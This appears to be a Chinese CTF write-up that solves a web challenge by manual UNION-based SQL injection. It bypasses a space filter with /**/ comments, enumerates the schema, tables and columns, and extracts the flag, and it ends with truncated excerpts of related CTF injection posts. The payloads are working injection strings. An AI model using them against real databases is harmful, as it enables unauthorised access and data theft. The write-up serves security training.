型別:web
**:攻擊:sql注入
一句話總結:
id有回顯的sql注入(手工)
測試發現過濾空格,用/**/代替空格
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
結果:web1
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/and/**/'1'='1
結果三個表,分別是baloteli、flag、web_1
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='web1'/**/and/**/table_name='flag'/**/and/**/'1'='1
結果三個字段,分別是baloteli、flag、id
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
結果兩條資料,分別是baloteli、flag
flag
CTF之SQL注入
github audi 1 sqli labs sqli labs 爆庫名select database 爆表名select group concat table name from information schema.tables where table schema database 爆列名s...
ctf題記錄之SQL注入
這是一道xctf平台上的upload題,我沒有想到它是個sql注入 0x01 開啟鏈結是乙個登陸介面,不管三七二十一先註冊登陸,是乙個檔案上傳的頁面,任意上傳檔案,發現只能傳jpg才能記錄下來。好像其他的都被過濾掉了。值得注意的是我們上傳的檔名都會顯示到頁面上,這個過程可能是經過資料庫查詢的,我們上...
實驗吧 CTF 簡單的sql注入思路
我們先用單引號測試 頁面錯誤 再加個單引號 頁面正常 那初步判斷語句應該是 select from xx where id 然後我們測試下我們滲透經常用的關鍵字有沒有被過濾 or and select union 1,2,3 information schema.tables information...